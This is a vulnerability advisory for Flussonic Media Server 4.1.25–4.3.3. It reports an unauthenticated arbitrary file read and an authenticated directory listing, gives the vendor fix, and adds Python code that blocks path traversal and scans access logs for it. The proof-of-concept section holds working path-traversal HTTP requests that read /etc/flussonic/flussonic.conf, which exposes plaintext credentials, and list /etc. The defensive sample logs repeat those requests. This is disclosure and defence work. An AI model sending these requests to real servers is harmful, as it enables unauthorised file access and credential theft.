"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure"

Author

Exploit author

"BGA Security"

Platform

Exploit platform

aix

Release date

Exploit published date

2014-07-01

Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities

Release Date:
===========
June 29, 2014

Product & Service Introduction:
========================
Flussonic is a multi-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP and MPEG-TS. Flussonic can capture multimedia from external sources such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).

Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.

Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and an arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3.

Vulnerability Disclosure Timeline:
=========================
June 26, 2014    :    Contact with Vendor
June 26, 2014    :    Vendor Response
June 26, 2014    :    Version 4.3.4 Deployed
June 29, 2014    :    Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3 

Exploitation Technique:
==================
AFR:    Remote, Unauthenticated
ADL:    Remote, Authenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
It is possible to read any file on the server (with the permissions of the user the application runs as) with a single HTTP GET request. The credentials for Flussonic's web interface are stored in plaintext in /etc/flussonic/flussonic.conf, so reading that file allows an attacker to log in to the web interface of any affected Flussonic instance.

2. Arbitrary Directory Listing (Authenticated)
It is possible to list the contents of any directory by sending an HTTP GET request to "flussonic/api/list_files" with the parameter "subpath=directory".


Proof of Concept (PoC):
==================
1. Proof of Concept AFR Request & Response:

GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687

# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;

live mylive;

file vod {
path priv;
}

2. Proof of Concept ADL Request & Response:

GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json

{"files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{"name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
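As an added example (not part of the BGA advisory or of the Flussonic code base), the Python below shows the defensive counterparts of the two findings: a resolver for a user-supplied "subpath" that refuses to leave its base directory, and a check over access-log request lines that flags the request shapes shown in the PoC. The base directory, the combined-log format and the sample log lines are assumed values constructed for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed base directory for the "vod" file location (hypothetical, not from the advisory).
VOD_BASE = "/var/lib/flussonic/vod"

def resolve_subpath(base_dir, subpath):
    """Hardened handling of a user-supplied 'subpath': decode (twice, to catch
    double encoding), normalise lexically, and return the final path only if
    it stays inside base_dir; None means traversal was attempted."""
    decoded = unquote(unquote(subpath))
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    # Normalise BEFORE joining with base_dir: joining first would let
    # '../../etc' collapse into '/etc' and slip past a prefix check.
    norm = posixpath.normpath(decoded)
    if norm == ".." or norm.startswith("../"):
        return None
    return posixpath.normpath(posixpath.join(base_dir, norm))

# Request line of a combined-format access log written by a reverse proxy.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def find_traversal_attempts(log_lines):
    """Return (line number, reason) for requests that try to leave the served
    tree via the URL path itself or via the list_files 'subpath' parameter."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if ".." in unquote(unquote(url.path)).split("/"):
            hits.append((number, "dot-dot segment in request path"))
        elif any(resolve_subpath(VOD_BASE, v) is None
                 for v in parse_qs(url.query).get("subpath", [])):
            hits.append((number, "subpath escapes base directory"))
    return hits

# Constructed sample log lines modelled on the two PoC requests in the advisory.
SAMPLE_LOG = [
    '6.6.6.5 - - [26/Jun/2014:09:50:57 +0000] "GET /../../../etc/flussonic/flussonic.conf HTTP/1.1" 200 191',
    '6.6.6.5 - flussonic [26/Jun/2014:11:04:12 +0000] "GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1" 200 7555',
    '6.6.6.7 - flussonic [26/Jun/2014:11:05:00 +0000] "GET /flussonic/api/list_files?subpath=movies%2F2014 HTTP/1.1" 200 412',
    '6.6.6.8 - - [26/Jun/2014:11:06:00 +0000] "GET /vod/clip.mp4 HTTP/1.1" 200 99',
]
```

Running find_traversal_attempts(SAMPLE_LOG) flags only the first two lines; the legitimate list_files call and the plain media fetch pass.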


Solution Fix & Patch:
================
Update to version 4.3.4.

Security Risk:
==========
The risk of the vulnerabilities above is estimated as high and medium.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain:    http://bga.com.tr/advisories.html
Social:    http://twitter.com/bgasecurity
Contact:   bilgi@bga.com.tr

Copyright © 2014 | BGA